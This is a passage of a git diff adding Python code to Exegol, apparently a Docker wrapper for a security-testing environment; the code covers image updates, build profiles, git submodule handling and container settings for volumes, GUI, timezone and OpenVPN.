ExegolContainerTemplate(name, config, image) + + # Recap + ExegolTUI.printContainerRecap(model) + if cls.__interactive_mode: + if not model.image.isUpToDate() and \ + Confirm("Do you want to [green]update[/green] the selected image?", False): + image = UpdateManager.updateImage(model.image.getName()) + if image is not None: + model.image = image + ExegolTUI.printContainerRecap(model) + command_options = [] + while not Confirm("Is the container configuration [green]correct[/green]?", default=True): + command_options = model.config.interactiveConfig(model.name) + ExegolTUI.printContainerRecap(model) + logger.info(f"Command line of the configuration: " + f"[green]exegol start {model.name} {model.image.getName()} {' '.join(command_options)}[/green]") + logger.info("To use exegol [orange3]without interaction[/orange3], " + "read CLI options with [green]exegol start -h[/green]") + + container = DockerUtils.createContainer(model) + container.postStartSetup() + return container + + @classmethod + def __createTmpContainer(cls, image_name: Optional[str] = None) -> ExegolContainer: + """Create a temporary ExegolContainer with custom entrypoint""" + logger.verbose("Configuring new exegol container") + # Create exegol config + config = cls.__prepareContainerConfig() + # When container exec a command as a daemon, the execution must be set on the container's entrypoint + if ParametersManager().daemon: + # Using formatShellCommand to support zsh aliases + cmd = ExegolContainer.formatShellCommand(ParametersManager().exec) + config.setContainerCommand(cmd) + # Workspace must be disabled for temporary container because host directory is never deleted + config.disableDefaultWorkspace() + name = f"tmp-{binascii.b2a_hex(os.urandom(4)).decode('ascii')}" + image: ExegolImage = cast(ExegolImage, cls.__loadOrInstallImage(override_image=image_name)) + model = ExegolContainerTemplate(name, config, image) + + container = DockerUtils.createContainer(model, temporary=True) + container.postStartSetup() + return container + + @classmethod + def __checkUselessParameters(cls): + """Checks if the container creation parameters have not been filled in when the container already existed""" + # Get defaults parameters + creation_parameters = ContainerCreation([]).__dict__ + # Get parameters from user input + user_inputs = ParametersManager().parameters.__dict__ + detected = [] + for param in creation_parameters.keys(): + # Skip parameters useful in a start context + if param in ('containertag',): + continue + # For each parameter, check if it's not None and different from the default + if user_inputs.get(param) is not None and \ + user_inputs.get(param) != creation_parameters.get(param).kwargs.get('default'): + # If the supplied parameter is positional, getting his printed name + name = creation_parameters.get(param).kwargs.get('metavar') + if name is None: + # if not, using the args name + detected.append(' / '.join(creation_parameters.get(param).args)) + else: + detected.append(name) + if len(detected) > 0: + logger.warning(f"These parameters ({', '.join(detected)}) have been entered although the container already " + f"exists, they will not be taken into account.") diff --git a/exegol/manager/UpdateManager.py b/exegol/manager/UpdateManager.py new file mode 100644 index 00000000..cd1d0d68 --- /dev/null +++ b/exegol/manager/UpdateManager.py @@ -0,0 +1,237 @@ +from typing import Optional, Dict, cast, Tuple, Sequence + +from rich.prompt import Prompt + +from exegol.console.ExegolPrompt import Confirm +from exegol.console.TUI import ExegolTUI +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.exceptions.ExegolExceptions import ObjectNotFound, CancelOperation +from exegol.model.ExegolImage import ExegolImage +from exegol.model.ExegolModules import ExegolModules +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.DockerUtils import DockerUtils +from exegol.utils.ExeLog import logger, console, ExeLog +from exegol.utils.GitUtils import GitUtils + + +class UpdateManager: + """Procedure class for updating the exegol tool and docker images""" + + @classmethod + def updateImage(cls, tag: Optional[str] = None, install_mode: bool = False) -> Optional[ExegolImage]: + """User procedure to build/pull docker image""" + # List Images + image_args = ParametersManager().imagetag + # Select image + if image_args is not None and tag is None: + tag = image_args + if tag is None: + try: + # Interactive selection + selected_image = ExegolTUI.selectFromTable(DockerUtils.listImages(), + object_type=ExegolImage, + allow_None=install_mode) + except IndexError: + # No images are available + if install_mode: + # If no image are available in install mode, + # either the user does not have internet, + # or the image repository has been changed and no docker image is available + logger.critical("Exegol can't be installed offline") + return None + else: + try: + # Find image by name + selected_image = DockerUtils.getImage(tag) + except ObjectNotFound: + # If the image do not exist, ask to build it + return cls.__askToBuild(tag) + + if selected_image is not None and type(selected_image) is ExegolImage: + # Update existing ExegolImage + if DockerUtils.downloadImage(selected_image, install_mode): + sync_result = None + # Name comparison allow detecting images without version tag + if not selected_image.isVersionSpecific() and selected_image.getName() != selected_image.getLatestVersionName(): + with console.status(f"Synchronizing version tag information. Please wait.", spinner_style="blue"): + # Download associated version tag. + sync_result = DockerUtils.downloadVersionTag(selected_image) + # Detect if an error have been triggered during the download + if type(sync_result) is str: + logger.error(f"Error while downloading version tag, {sync_result}") + sync_result = None + # if version tag have been successfully download, returning ExegolImage from docker response + if sync_result is not None and type(sync_result) is ExegolImage: + return sync_result + return DockerUtils.getInstalledImage(selected_image.getName()) + elif type(selected_image) is str: + # Build a new image using TUI selected name, confirmation has already been requested by TUI + return cls.buildAndLoad(selected_image) + else: + # Unknown use case + logger.critical(f"Unknown selected image type: {type(selected_image)}. Exiting.") + return cast(Optional[ExegolImage], selected_image) + + @classmethod + def __askToBuild(cls, tag: str) -> Optional[ExegolImage]: + """Build confirmation process and image building""" + # Need confirmation from the user before starting building. + if ParametersManager().build_profile is not None or \ + Confirm("Do you want to build locally a custom image?", default=False): + return cls.buildAndLoad(tag) + return None + + @classmethod + def updateWrapper(cls) -> bool: + """Update wrapper source code from git""" + return cls.__updateGit(ExegolModules().getWrapperGit()) + + @classmethod + def updateImageSource(cls) -> bool: + """Update image source code from git submodule""" + return cls.__updateGit(ExegolModules().getSourceGit()) + + @classmethod + def updateResources(cls) -> bool: + """Update Exegol-resources from git (submodule)""" + try: + if not ExegolModules().isExegolResourcesReady() and not Confirm('Do you want to update exegol resources.', default=True): + return False + return cls.__updateGit(ExegolModules().getResourcesGit()) + except CancelOperation: + # Error during installation, skipping operation + return False + + @staticmethod + def __updateGit(gitUtils: GitUtils) -> bool: + """User procedure to update local git repository""" + if not gitUtils.isAvailable: + logger.empty_line() + return False + logger.info(f"Updating Exegol [green]{gitUtils.getName()}[/green] {gitUtils.getSubject()}") + # Check if pending change -> cancel + if not gitUtils.safeCheck(): + logger.error("Aborting git update.") + logger.empty_line() + return False + current_branch = gitUtils.getCurrentBranch() + if current_branch is None: + logger.warning("HEAD is detached. Please checkout to an existing branch.") + current_branch = "unknown" + if logger.isEnabledFor(ExeLog.VERBOSE) or current_branch not in ["master", "main"]: + available_branches = gitUtils.listBranch() + # Ask to checkout only if there is more than one branch available + if len(available_branches) > 1: + logger.info(f"Current git branch : {current_branch}") + # List & Select git branch + if current_branch == 'unknown' or current_branch not in available_branches: + if "main" in available_branches: + default_choice = "main" + elif "master" in available_branches: + default_choice = "master" + else: + default_choice = None + else: + default_choice = current_branch + selected_branch = cast(str, ExegolTUI.selectFromList(gitUtils.listBranch(), + subject="a git branch", + title="[not italic]:palm_tree: [/not italic][gold3]Branch[gold3]", + default=default_choice)) + elif len(available_branches) == 0: + logger.warning("No branch were detected!") + selected_branch = None + else: + # Automatically select the only branch in case of HEAD detachment + selected_branch = available_branches[0] + # Checkout new branch + if selected_branch is not None and selected_branch != current_branch: + gitUtils.checkout(selected_branch) + # git pull + gitUtils.update() + logger.empty_line() + return True + + @classmethod + def __buildSource(cls, build_name: Optional[str] = None) -> str: + """build user process : + Ask user is he want to update the git source (to get new& updated build profiles), + User choice a build name (if not supplied) + User select a build profile + Start docker image building + Return the name of the built image""" + # Ask to update git + try: + if ExegolModules().getSourceGit().isAvailable and not ExegolModules().getSourceGit().isUpToDate() and \ + Confirm("Do you want to update image sources (in order to update local build profiles)?", default=True): + cls.updateImageSource() + except AssertionError: + # Catch None git object assertions + logger.warning("Git update is [orange3]not available[/orange3]. Skipping.") + # Choose tag name + blacklisted_build_name = ["stable", "full"] + while build_name is None or build_name in blacklisted_build_name: + if build_name is not None: + logger.error("This name is reserved and cannot be used for local build. Please choose another one.") + build_name = Prompt.ask("[bold blue][?][/bold blue] Choice a name for your build", + default="local") + # Choose dockerfile + profiles = cls.listBuildProfiles() + build_profile: Optional[str] = ParametersManager().build_profile + build_dockerfile: Optional[str] = None + if build_profile is not None: + build_dockerfile = profiles.get(build_profile) + if build_dockerfile is None: + logger.error(f"Build profile {build_profile} not found.") + if build_dockerfile is None: + build_profile, build_dockerfile = cast(Tuple[str, str], ExegolTUI.selectFromList(profiles, + subject="a build profile", + title="[not italic]:dog: [/not italic][gold3]Profile[/gold3]")) + logger.debug(f"Using {build_profile} build profile ({build_dockerfile})") + # Docker Build + DockerUtils.buildImage(build_name, build_profile, build_dockerfile) + return build_name + + @classmethod + def buildAndLoad(cls, tag: str): + """Build an image and load it""" + build_name = cls.__buildSource(tag) + return DockerUtils.getInstalledImage(build_name) + + @classmethod + def listBuildProfiles(cls) -> Dict: + """List every build profiles available locally + Return a dict of options {"key = profile name": "value = dockerfile full name"}""" + # Default stable profile + profiles = {"full": "Dockerfile"} + # List file *.dockerfile is the build context directory + logger.debug(f"Loading build profile from {ConstantConfig.build_context_path}") + docker_files = list(ConstantConfig.build_context_path_obj.glob("*.dockerfile")) + for file in docker_files: + # Convert every file to the dict format + filename = file.name + profile_name = filename.replace(".dockerfile", "") + profiles[profile_name] = filename + logger.debug(f"List docker build profiles : {profiles}") + return profiles + + @classmethod + def listGitStatus(cls) -> Sequence[Dict[str, str]]: + result = [] + gits = [ExegolModules().getWrapperGit(fast_load=True), + ExegolModules().getSourceGit(fast_load=True), + ExegolModules().getResourcesGit(fast_load=True, skip_install=True)] + + with console.status(f"Loading module information", spinner_style="blue") as s: + for git in gits: + s.update(status=f"Loading module [green]{git.getName()}[/green] information") + status = git.getTextStatus() + branch = git.getCurrentBranch() + if branch is None: + if "not supported" in status: + branch = "[bright_black]N/A[/bright_black]" + else: + branch = "[bright_black][g]? :person_shrugging:[/g][/bright_black]" + result.append({"name": git.getName().capitalize(), + "status": status, + "current branch": branch}) + return result diff --git a/exegol/manager/__init__.py b/exegol/manager/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/model/ContainerConfig.py b/exegol/model/ContainerConfig.py new file mode 100644 index 00000000..e8dc62ac --- /dev/null +++ b/exegol/model/ContainerConfig.py @@ -0,0 +1,797 @@ +import os +import re +from pathlib import Path, PurePath +from typing import Optional, List, Dict, Union, Tuple, cast + +from docker.models.containers import Container +from docker.types import Mount +from rich.prompt import Prompt + +from exegol.console.ConsoleFormat import boolFormatter, getColor +from exegol.console.ExegolPrompt import Confirm +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.exceptions.ExegolExceptions import ProtocolNotSupported, CancelOperation +from exegol.model.ExegolModules import ExegolModules +from exegol.utils import FsUtils +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, ExeLog +from exegol.utils.GuiUtils import GuiUtils +from exegol.utils.UserConfig import UserConfig + + +class ContainerConfig: + """Configuration class of an exegol container""" + + # Default hardcoded value + __default_entrypoint = "bash" + __default_shm_size = "64M" + + def __init__(self, container: Optional[Container] = None): + """Container config default value""" + self.__enable_gui: bool = False + self.__share_timezone: bool = False + self.__shared_resources: bool = False + self.__exegol_resources: bool = False + self.__network_host: bool = True + self.__privileged: bool = False + self.__mounts: List[Mount] = [] + self.__devices: List[str] = [] + self.__capabilities: List[str] = [] + self.__sysctls: Dict[str, str] = {} + self.__envs: Dict[str, str] = {} + self.__ports: Dict[str, Optional[Union[int, Tuple[str, int], List[int]]]] = {} + self.interactive: bool = True + self.tty: bool = True + self.shm_size: str = self.__default_shm_size + self.__workspace_custom_path: Optional[str] = None + self.__workspace_dedicated_path: Optional[str] = None + self.__disable_workspace: bool = False + self.__container_command: str = self.__default_entrypoint + self.__vpn_path: Optional[Union[Path, PurePath]] = None + if container is not None: + self.__parseContainerConfig(container) + + def __parseContainerConfig(self, container: Container): + """Parse Docker object to setup self configuration""" + # Container Config section + container_config = container.attrs.get("Config", {}) + self.tty = container_config.get("Tty", True) + self.__parseEnvs(container_config.get("Env", [])) + self.interactive = container_config.get("OpenStdin", True) + self.__enable_gui = False + for env in self.__envs: + if "DISPLAY" in env: + self.__enable_gui = True + break + + # Host Config section + host_config = container.attrs.get("HostConfig", {}) + self.__privileged = host_config.get("Privileged", False) + caps = host_config.get("CapAdd", []) + if caps is not None: + self.__capabilities = caps + logger.debug(f"Capabilities : {self.__capabilities}") + self.__sysctls = host_config.get("Sysctls", {}) + devices = host_config.get("Devices", []) + if devices is not None: + for device in devices: + self.__devices.append( + f"{device.get('PathOnHost', '?')}:{device.get('PathInContainer', '?')}:{device.get('CgroupPermissions', '?')}") + logger.debug(f"Load devices : {self.__devices}") + + # Volumes section + self.__share_timezone = False + self.__shared_resources = False + self.__parseMounts(container.attrs.get("Mounts", []), container.name.replace('exegol-', '')) + + # Network section + network_settings = container.attrs.get("NetworkSettings", {}) + self.__network_host = "host" in network_settings["Networks"] + self.__ports = network_settings.get("Ports", {}) + + def __parseEnvs(self, envs: List[str]): + """Parse envs object syntax""" + for env in envs: + logger.debug(f"Parsing envs : {env}") + # Removing " and ' at the beginning and the end of the string before splitting key / value + self.addRawEnv(env.strip("'").strip('"')) + + def __parseMounts(self, mounts: Optional[List[Dict]], name: str): + """Parse Mounts object""" + if mounts is None: + mounts = [] + self.__disable_workspace = True + for share in mounts: + logger.debug(f"Parsing mount : {share}") + src_path: Optional[PurePath] = None + obj_path: PurePath + if share.get('Type', 'volume') == "volume": + source = f"Docker {share.get('Driver', '')} volume '{share.get('Name', 'unknown')}'" + else: + source = share.get("Source", '') + src_path = FsUtils.parseDockerVolumePath(source) + + # When debug is disabled, exegol print resolved windows path of mounts + if logger.getEffectiveLevel() > ExeLog.ADVANCED: + source = str(src_path) + + self.__mounts.append(Mount(source=source, + target=share.get('Destination'), + type=share.get('Type', 'volume'), + read_only=(not share.get("RW", True)), + propagation=share.get('Propagation', ''))) + if "/etc/timezone" in share.get('Destination', ''): + self.__share_timezone = True + elif "/opt/resources" in share.get('Destination', ''): + self.__exegol_resources = True + elif "/my-resources" in share.get('Destination', ''): + self.__shared_resources = True + elif "/workspace" in share.get('Destination', ''): + # Workspace are always bind mount + assert src_path is not None + obj_path = cast(PurePath, src_path) + logger.debug(f"Loading workspace volume source : {obj_path}") + self.__disable_workspace = False + if obj_path is not None and obj_path.name == name and \ + (obj_path.parent.name == "shared-data-volumes" or obj_path.parent == UserConfig().private_volume_path): # Check legacy path and new custom path + logger.debug("Private workspace detected") + self.__workspace_dedicated_path = str(obj_path) + else: + logger.debug("Custom workspace detected") + self.__workspace_custom_path = str(obj_path) + elif "/vpn" in share.get('Destination', ''): + # VPN are always bind mount + assert src_path is not None + obj_path = cast(PurePath, src_path) + self.__vpn_path = obj_path + logger.debug(f"Loading VPN config: {self.__vpn_path.name}") + + def interactiveConfig(self, container_name: str) -> List[str]: + """Interactive procedure allowing the user to configure its new container""" + logger.info("Starting interactive configuration") + + command_options = [] + + # Workspace config + if Confirm( + "Do you want to [green]share[/green] your [blue]current host working directory[/blue] in the new container's worskpace?", + default=False): + self.enableCwdShare() + command_options.append("-cwd") + elif Confirm( + f"Do you want to [green]share[/green] [blue]a host directory[/blue] in the new container's workspace [blue]different than the default one[/blue] ([magenta]{UserConfig().private_volume_path / container_name}[/magenta])?", + default=False): + while True: + workspace_path = Prompt.ask("Enter the path of your workspace") + if Path(workspace_path).expanduser().is_dir(): + break + else: + logger.error("The provided path is not a folder or does not exist.") + self.setWorkspaceShare(workspace_path) + command_options.append(f"-w {workspace_path}") + + # GUI Config + if self.__enable_gui: + if Confirm("Do you want to [orange3]disable[/orange3] [blue]GUI[/blue]?", False): + self.__disableGUI() + elif Confirm("Do you want to [green]enable[/green] [blue]GUI[/blue]?", False): + self.enableGUI() + # Command builder info + if not self.__enable_gui: + command_options.append("--disable-X11") + + # Timezone config + if self.__share_timezone: + if Confirm("Do you want to [orange3]remove[/orange3] your [blue]shared timezone[/blue] config?", False): + self.__disableSharedTimezone() + elif Confirm("Do you want to [green]share[/green] your [blue]host's timezone[/blue]?", False): + self.enableSharedTimezone() + # Command builder info + if not self.__share_timezone: + command_options.append("--disable-shared-timezones") + + # Shared resources config + if self.__shared_resources: + if Confirm("Do you want to [orange3]disable[/orange3] the [blue]shared resources[/blue]?", False): + self.__disableSharedResources() + elif Confirm("Do you want to [green]activate[/green] the [blue]shared resources[/blue]?", False): + self.enableSharedResources() + # Command builder info + if not self.__shared_resources: + command_options.append("--disable-shared-resources") + + # Exegol resources config + if self.__exegol_resources: + if Confirm("Do you want to [orange3]disable[/orange3] the [blue]exegol resources[/blue]?", False): + self.disableExegolResources() + elif Confirm("Do you want to [green]activate[/green] the [blue]exegol resources[/blue]?", False): + self.enableExegolResources() + # Command builder info + if not self.__exegol_resources: + command_options.append("--disable-exegol-resources") + + # Network config + if self.__network_host: + if Confirm("Do you want to use a [blue]dedicated private network[/blue]?", False): + self.setNetworkMode(False) + elif Confirm("Do you want to share the [green]host's[/green] [blue]networks[/blue]?", False): + self.setNetworkMode(True) + # Command builder info + if not self.__network_host: + command_options.append("--disable-shared-network") + + # VPN config + if self.__vpn_path is None and Confirm( + "Do you want to [green]enable[/green] a [blue]VPN[/blue] for this container", False): + while True: + vpn_path = Prompt.ask('Enter the path to the OpenVPN config file') + if Path(vpn_path).expanduser().is_file(): + self.enableVPN(vpn_path) + break + else: + logger.error("No config files were found.") + elif self.__vpn_path and Confirm( + "Do you want to [orange3]remove[/orange3] your [blue]VPN configuration[/blue] in this container", False): + self.__disableVPN() + if self.__vpn_path: + command_options.append(f"--vpn {self.__vpn_path}") + + return command_options + + def enableGUI(self): + """Procedure to enable GUI feature""" + if not GuiUtils.isGuiAvailable(): + logger.error("GUI feature is [red]not available[/red] on your environment. [orange3]Skipping[/orange3].") + return + if not self.__enable_gui: + self.__enable_gui = True + logger.verbose("Config: Enabling display sharing") + self.addVolume(GuiUtils.getX11SocketPath(), "/tmp/.X11-unix") + self.addEnv("DISPLAY", GuiUtils.getDisplayEnv()) + self.addEnv("QT_X11_NO_MITSHM", "1") + # TODO support pulseaudio + + def __disableGUI(self): + """Procedure to enable GUI feature (Only for interactive config)""" + if self.__enable_gui: + self.__enable_gui = False + logger.verbose("Config: Disabling display sharing") + self.removeVolume(container_path="/tmp/.X11-unix") + self.removeEnv("DISPLAY") + self.removeEnv("QT_X11_NO_MITSHM") + + def enableSharedTimezone(self): + """Procedure to enable shared timezone feature""" + if EnvInfo.is_windows_shell: + logger.warning("Timezone sharing is not supported from a Windows shell. Skipping.") + return + if not self.__share_timezone: + self.__share_timezone = True + logger.verbose("Config: Enabling host timezones") + self.addVolume("/etc/timezone", "/etc/timezone", read_only=True) + self.addVolume("/etc/localtime", "/etc/localtime", read_only=True) + + def __disableSharedTimezone(self): + """Procedure to disable shared timezone feature (Only for interactive config)""" + if self.__share_timezone: + self.__share_timezone = False + logger.verbose("Config: Disabling host timezones") + self.removeVolume("/etc/timezone") + self.removeVolume("/etc/localtime") + + def setPrivileged(self, status: bool = True): + """Set container as privileged""" + logger.verbose(f"Config: Setting container privileged as {status}") + if status: + logger.warning("Setting container as privileged (this exposes the host to security risks)") + self.__privileged = status + + def enableSharedResources(self): + """Procedure to enable shared volume feature""" + if not self.__shared_resources: + logger.verbose("Config: Enabling shared resources volume") + self.__shared_resources = True + # Adding volume config + self.addVolume(UserConfig().shared_resources_path, '/my-resources') + + def __disableSharedResources(self): + """Procedure to disable shared volume feature (Only for interactive config)""" + if self.__shared_resources: + logger.verbose("Config: Disabling shared resources volume") + self.__shared_resources = False + self.removeVolume(container_path='/my-resources') + + def enableExegolResources(self) -> bool: + """Procedure to enable exegol resources volume feature""" + if not self.__exegol_resources: + # Check if resources are installed / up-to-date + try: + if not ExegolModules().isExegolResourcesReady(): + raise CancelOperation + except CancelOperation: + # Error during installation, skipping operation + logger.warning("Exegol resources have not been downloaded, the feature cannot be enabled") + return False + logger.verbose("Config: Enabling exegol resources volume") + self.__exegol_resources = True + # Adding volume config + self.addVolume(str(UserConfig().exegol_resources_path), '/opt/resources') + return True + + def disableExegolResources(self): + """Procedure to disable exegol resources volume feature (Only for interactive config)""" + if self.__exegol_resources: + logger.verbose("Config: Disabling exegol resources volume") + self.__exegol_resources = False + self.removeVolume(container_path='/opt/resources') + + def enableCwdShare(self): + """Procedure to share Current Working Directory with the /workspace of the container""" + self.__workspace_custom_path = os.getcwd() + logger.verbose(f"Config: Sharing current workspace directory {self.__workspace_custom_path}") + + def setWorkspaceShare(self, host_directory): + """Procedure to share a specific directory with the /workspace of the container""" + path = Path(host_directory).expanduser().absolute() + if not path.is_dir(): + logger.critical("The specified workspace is not a directory") + logger.verbose(f"Config: Sharing workspace directory {path}") + self.__workspace_custom_path = str(path) + + def enableVPN(self, config_path: Optional[str] = None): + """Configure a VPN profile for container startup""" + # Check host mode : custom (allows you to isolate the VPN connection from the host's network) + if self.__network_host: + logger.warning("Using the host network mode with a VPN profile is not recommended.") + if not Confirm(f"Are you sure you want to configure a VPN container based on the host's network?", + default=False): + logger.info("Changing network mode to custom") + self.setNetworkMode(False) + # Add NET_ADMIN capabilities, this privilege is necessary to mount network tunnels + self.__addCapability("NET_ADMIN") + if not self.__network_host: + # Add sysctl ipv6 config, some VPN connection need IPv6 to be enabled + self.__addSysctl("net.ipv6.conf.all.disable_ipv6", "0") + # Add tun device, this device is needed to create VPN tunnels + self.addDevice("/dev/net/tun", mknod=True) + # Sharing VPN configuration with the container + ovpn_parameters = self.__prepareVpnVolumes(config_path) + # Execution of the VPN daemon at container startup + if ovpn_parameters is not None: + self.setContainerCommand( + f"bash -c 'cd /vpn/config; openvpn {ovpn_parameters} | tee /var/log/vpn.log; bash'") # TODO add log rotation on image config + + def __prepareVpnVolumes(self, config_path: Optional[str]) -> Optional[str]: + """Volumes must be prepared to share OpenVPN configuration files with the container. + Depending on the user's settings, different configurations can be applied. + With or without username / password authentication via auth-user-pass. + OVPN config file directly supplied or a config directory, + the directory feature is useful when the configuration depends on multiple files like certificate, keys etc.""" + ovpn_parameters = [] + + # VPN Auth creds file + input_vpn_auth = ParametersManager().vpn_auth + vpn_auth = None + if input_vpn_auth is not None: + vpn_auth = Path(input_vpn_auth).expanduser() + + if vpn_auth is not None: + if vpn_auth.is_file(): + logger.info(f"Adding VPN credentials from: {str(vpn_auth.absolute())}") + self.addVolume(str(vpn_auth.absolute()), "/vpn/auth/creds.txt", read_only=True) + ovpn_parameters.append("--auth-user-pass /vpn/auth/creds.txt") + else: + # Supply a directory instead of a file for VPN authentication is not supported. + logger.critical( + f"The path provided to the VPN connection credentials ({str(vpn_auth)}) does not lead to a file. Aborting operation.") + + # VPN config path + vpn_path = Path(config_path if config_path else ParametersManager().vpn).expanduser() + + logger.debug(f"Adding VPN from: {str(vpn_path.absolute())}") + self.__vpn_path = vpn_path + if vpn_path.is_file(): + # Configure VPN with single file + self.addVolume(str(vpn_path.absolute()), "/vpn/config/client.ovpn", read_only=True) + ovpn_parameters.append("--config /vpn/config/client.ovpn") + else: + # Configure VPN with directory + logger.verbose( + "Folder detected for VPN configuration. only the first *.ovpn file will be automatically launched when the container starts.") + self.addVolume(str(vpn_path.absolute()), "/vpn/config", read_only=True) + vpn_filename = None + # Try to find the config file in order to configure the autostart command of the container + for file in vpn_path.glob('*.ovpn'): + logger.info(f"Using VPN config: {file}") + # Get filename only to match the future container path + vpn_filename = file.name + ovpn_parameters.append(f"--config /vpn/config/{vpn_filename}") + # If there is multiple match, only the first one is selected + break + if vpn_filename is None: + logger.error("No *.ovpn files were detected. The VPN autostart will not work.") + return None + + return ' '.join(ovpn_parameters) + + def __disableVPN(self) -> bool: + """Remove a VPN profile for container startup (Only for interactive config)""" + if self.__vpn_path: + logger.verbose('Removing VPN configuration') + self.__vpn_path = None + self.__removeCapability("NET_ADMIN") + self.__removeSysctl("net.ipv6.conf.all.disable_ipv6") + self.removeDevice("/dev/net/tun") + # Try to remove each possible volume + self.removeVolume(container_path="/vpn/auth/creds.txt") + self.removeVolume(container_path="/vpn/config/client.ovpn") + self.removeVolume(container_path="/vpn/config") + self.__restoreEntrypoint() + return True + return False + + def disableDefaultWorkspace(self): + """Allows you to disable the default workspace volume""" + # If a custom workspace is not define, disable workspace + if self.__workspace_custom_path is None: + self.__disable_workspace = True + + def prepareShare(self, share_name: str): + """Add workspace share before container creation""" + for mount in self.__mounts: + if mount.get('Target') == '/workspace': + # Volume is already prepared + return + if self.__workspace_custom_path is not None: + self.addVolume(self.__workspace_custom_path, '/workspace') + elif self.__disable_workspace: + # Skip default volume workspace if disabled + return + else: + # Add shared-data-volumes private workspace bind volume + volume_path = str(UserConfig().private_volume_path.joinpath(share_name)) + self.addVolume(volume_path, '/workspace') + + def setNetworkMode(self, host_mode: bool): + """Set container's network mode, true for host, false for bridge""" + if host_mode is None: + host_mode = True + self.__network_host = host_mode + + def setContainerCommand(self, cmd: str): + """Set the entrypoint command of the container. This command is executed at each startup. + This parameter is applied to the container at creation.""" + self.__container_command = cmd + + def __restoreEntrypoint(self): + """Restore container's entrypoint to its default configuration""" + self.__container_command = self.__default_entrypoint + + def __addCapability(self, cap_string: str): + """Add a linux capability to the container""" + if cap_string in self.__capabilities: + logger.warning("Capability already setup. Skipping.") + return + self.__capabilities.append(cap_string) + + def __removeCapability(self, cap_string: str): + """Remove a linux capability from the container's config""" + try: + self.__capabilities.remove(cap_string) + return True + except ValueError: + # When the capability is not present + return False + + def __addSysctl(self, sysctl_key: str, config: str): + """Add a linux sysctl to the container""" + if sysctl_key in self.__sysctls.keys(): + logger.warning(f"Sysctl {sysctl_key} already setup to '{self.__sysctls[sysctl_key]}'. Skipping.") + return + self.__sysctls[sysctl_key] = config + + def __removeSysctl(self, sysctl_key: str): + """Remove a linux capability from the container's config""" + try: + self.__sysctls.pop(sysctl_key) + return True + except KeyError: + # When the sysctl is not present + return False + + def getNetworkMode(self) -> str: + """Network mode, text getter""" + return "host" if self.__network_host else "bridge" + + def getPrivileged(self) -> bool: + """Privileged getter""" + return self.__privileged + + def getCapabilities(self) -> List[str]: + """Capabilities getter""" + return self.__capabilities + + def getSysctls(self) -> Dict[str, str]: + """Sysctl custom rules getter""" + return self.__sysctls + + def getWorkingDir(self) -> str: + """Get default container's default working directory path""" + return "/" if self.__disable_workspace else "/workspace" + + def getContainerCommand(self) -> str: + """Get container entrypoint path""" + return self.__container_command + + def getHostWorkspacePath(self) -> str: + """Get private volume path (None if not set)""" + if self.__workspace_custom_path: + return FsUtils.resolvStrPath(self.__workspace_custom_path) + elif self.__workspace_dedicated_path: + return FsUtils.resolvStrPath(self.__workspace_dedicated_path) + return "not found :(" + + def getPrivateVolumePath(self) -> str: + """Get private volume path (None if not set)""" + return FsUtils.resolvStrPath(self.__workspace_dedicated_path) + + def isSharedResourcesEnable(self) -> bool: + """Return if the feature 'shared resources' is enabled in this container config""" + return self.__shared_resources + + def isExegolResourcesEnable(self) -> bool: + """Return if the feature 'exegol resources' is enabled in this container config""" + return self.__exegol_resources + + def isGUIEnable(self) -> bool: + """Return if the feature 'GUI' is enabled in this container config""" + return self.__enable_gui + + def isTimezoneShared(self) -> bool: + """Return if the feature 'timezone' is enabled in this container config""" + return self.__share_timezone + + def isWorkspaceCustom(self) -> bool: + """Return if the workspace have a custom host volume""" + return bool(self.__workspace_custom_path) + + def addVolume(self, + host_path: str, + container_path: str, + read_only: bool = False, + volume_type: str = 'bind'): + """Add a volume to the container configuration""" + # The creation of the directory is ignored when it is a path to the remote drive + if volume_type == 'bind' and not host_path.startswith("\\\\"): + try: + os.makedirs(host_path, exist_ok=True) + except PermissionError: + logger.error("Unable to create the volume folder on the filesystem locally.") + logger.critical(f"Insufficient permissions to create the folder: {host_path}") + except FileExistsError: + # The volume targets a file that already exists on the file system + pass + mount = Mount(container_path, host_path, read_only=read_only, type=volume_type) + self.__mounts.append(mount) + + def addRawVolume(self, volume_string): + """Add a volume to the container configuration from raw text input. + Expected format is: /source/path:/target/mount:rw""" + logger.debug(f"Parsing raw volume config: {volume_string}") + parsing = re.match(r'^((\w:)?([\\/][\w .,:\-|()&;]*)+):(([\\/][\w .,\-|()&;]*)+)(:(ro|rw))?$', + volume_string) + if parsing: + host_path = parsing.group(1) + container_path = parsing.group(4) + mode = parsing.group(7) + if mode is None or mode == "rw": + readonly = False + elif mode == "ro": + readonly = True + else: + logger.error(f"Error on volume config, mode: {mode} not recognized.") + readonly = False + logger.debug( + f"Adding a volume from '{host_path}' to '{container_path}' as {'readonly' if readonly else 'read/write'}") + self.addVolume(host_path, container_path, readonly) + else: + logger.critical(f"Volume '{volume_string}' cannot be parsed. Exiting.") + + def removeVolume(self, host_path: Optional[str] = None, container_path: Optional[str] = None) -> bool: + """Remove a volume from the container configuration (Only before container creation)""" + if host_path is None and container_path is None: + # This is a dev problem + raise ReferenceError('At least one parameter must be set') + for i in range(len(self.__mounts)): + # For each Mount object compare the host_path if supplied or the container_path si supplied + if host_path is not None and self.__mounts[i].get("Source") == host_path: + # When the right object is found, remove it from the list + self.__mounts.pop(i) + return True + if container_path is not None and self.__mounts[i].get("Target") == container_path: + # When the right object is found, remove it from the list + self.__mounts.pop(i) + return True + return False + + def getVolumes(self) -> List[Mount]: + """Volume config getter""" + return self.__mounts + + def addDevice(self, + device_source: str, + device_dest: Optional[str] = None, + readonly: bool = False, + mknod: bool = False): + """Add a device to the container configuration""" + if device_dest is None: + device_dest = device_source + perm = 'r' + if not readonly: + perm += 'w' + if mknod: + perm += 'm' + self.__devices.append(f"{device_source}:{device_dest}:{perm}") + + def removeDevice(self, device_source: str) -> bool: + """Remove a device from the container configuration (Only before container creation)""" + for i in range(len(self.__devices)): + # For each device, compare source device + if self.__devices[i].split(':')[0] == device_source: + # When found, remove it from the config list + self.__devices.pop(i) + return True + return False + + def getDevices(self) -> List[str]: + """Devices config getter""" + return self.__devices + + def addEnv(self, key: str, value: str): + """Add an environment variable to the container configuration""" + self.__envs[key] = value + + def removeEnv(self, key: str) -> bool: + """Remove an environment variable to the container configuration (Only before container creation)""" + try: + self.__envs.pop(key) + return True + except 